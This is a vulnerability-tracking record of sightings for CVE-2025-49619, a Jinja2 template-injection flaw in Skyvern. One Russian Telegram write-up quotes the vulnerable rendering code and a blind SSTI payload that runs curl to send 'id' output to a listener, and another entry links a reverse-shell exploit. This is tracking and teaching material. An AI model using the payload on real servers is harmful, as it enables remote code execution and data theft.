{"vulnerability": "CVE-2025-49619", "sightings": [{"uuid": "319de80a-b2fd-46f2-9c22-0edc42550567", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49619", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lrquv7vz252c", "content": "", "creation_timestamp": "2025-06-16T21:02:29.771077Z"}, {"uuid": "28c82c4e-3517-435d-ad30-71e9ad84252b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49619", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:04.000000Z"}, {"uuid": "67c70cbe-c677-46d9-93e2-056a5672a030", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49619", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lsu3g2dp2x2i", "content": "", "creation_timestamp": "2025-06-30T21:02:26.104166Z"}, {"uuid": "d9778d73-dc30-41cd-a214-41ada53008e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49619", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lqzszxvl7m2c", "content": "", "creation_timestamp": "2025-06-07T16:58:06.155621Z"}, {"uuid": "c3d9fdce-c03c-424f-9a14-87380afaf436", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49619", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/skyvern_ssti_cve_2025_49619.rb", "content": "", "creation_timestamp": "2025-06-29T14:45:21.000000Z"}, {"uuid": "39d95e78-d4c5-4335-9163-add2dd2b1b96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49619", "type": "published-proof-of-concept", "source": "Telegram/YSJhdJjMlrABiHF1mC9tmQTTaLYxNBOL8QpiCjaALoLvyOE", "content": "", "creation_timestamp": "2025-06-07T14:30:39.000000Z"}, {"uuid": "727481af-1bd1-42e6-8475-15a75ecd9eb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49619", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3mbcraj3vit24", "content": "", "creation_timestamp": "2025-12-31T21:03:13.987393Z"}, {"uuid": "264b3799-6b97-4091-9afe-9278f67e7ede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49619", "type": "published-proof-of-concept", "source": "https://t.me/wr3dmast3rvs/58", "content": "\u0421\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u043e \u0441 linuxson \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u0443\u0447\u0438\u0442\u044c\u0441\u044f \u0430\u043d\u0430\u043b\u0438\u0437\u0443 \u043a\u043e\u0434\u0430, \u0438 \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u0432\u044b\u0431\u043e\u0440 \u043f\u0430\u043b \u043d\u0430 RCE \u0432 Skyvern (CVE-2025-49619): \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0432 \u0448\u0430\u0431\u043b\u043e\u043d\u0430\u0445 Jinja2 \u0447\u0435\u0440\u0435\u0437 Navigation V2 Block \ud83e\udd2a\n\nSkyvern \u2014 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a \u0434\u043b\u044f \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0430\u0446\u0438\u0438 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043d\u044b\u0445 workflow. \u0412 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0434\u043e 0.1.85 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0447\u0435\u0440\u0435\u0437 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044e \u0432 \u0448\u0430\u0431\u043b\u043e\u043d\u044b Jinja2 \ud83d\udcaa\n\n\u0421\u0443\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438:\n1. \u041d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u0430\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0430 \u0448\u0430\u0431\u043b\u043e\u043d\u043e\u0432: \u043f\u043e\u043b\u0435 prompt \u0432 \u0431\u043b\u043e\u043a\u0430\u0445 (\u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u0435\u0435 \u2014 Navigation V2) \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u043b\u043e \u043d\u0435\u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u044b\u0435 Jinja2-\u0432\u044b\u0440\u0430\u0436\u0435\u043d\u0438\u044f;\n2. \u041f\u0440\u044f\u043c\u0430\u044f \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0430 \u0432 Jinja2: \u0432\u0445\u043e\u0434\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0440\u0435\u043d\u0434\u0435\u0440\u0438\u043b\u0438\u0441\u044c \u0447\u0435\u0440\u0435\u0437 Template() \u0431\u0435\u0437 sandbox, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a globals \u0438 builtins.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u043a\u043e\u0434:\n1. \u041a\u0440\u0438\u0442\u0438\u0447\u043d\u044b\u0439 \u0438\u043c\u043f\u043e\u0440\u0442:\nfrom jinja2 import Template\n\n2. \u041e\u043f\u0430\u0441\u043d\u044b\u0439 \u0440\u0435\u043d\u0434\u0435\u0440\u0438\u043d\u0433 (\u043c\u0435\u0442\u043e\u0434 format_block_parameter_template_from_workflow_run_context):\ntemplate = Template(potential_template) \ntemplate.render(context)\n\n\u041f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 Blind SSTI:\n{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('curl http://0.0.0.0:6666/?os=$(id)').read() }}\n\n\u0414\u043b\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442.\n\n\u0413\u043b\u0430\u0432\u043d\u0430\u044f \u0446\u0435\u043b\u044c \u2014 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u043e\u0442 \"\u0441\u043b\u0435\u043f\u043e\u0433\u043e \u0444\u0430\u0437\u0437\u0438\u043d\u0433\u0430\" \u043a \u043e\u0441\u043e\u0437\u043d\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u0438\u0441\u043a\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043f\u043e\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043a\u043e\u0434\u0430, \u0434\u0430\u0436\u0435 \u043f\u0440\u0438 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0435 \u0431\u0430\u0437\u044b \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0438 \ud83d\udd25", "creation_timestamp": "2025-06-22T08:26:13.000000Z"}, {"uuid": "76b81b7a-dc3a-4656-a7ba-67209107c9de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49619", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/40532", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aThis script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.\nURL\uff1ahttps://github.com/cristibtz/CVE-2025-49619\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-06-15T08:14:08.000000Z"}]}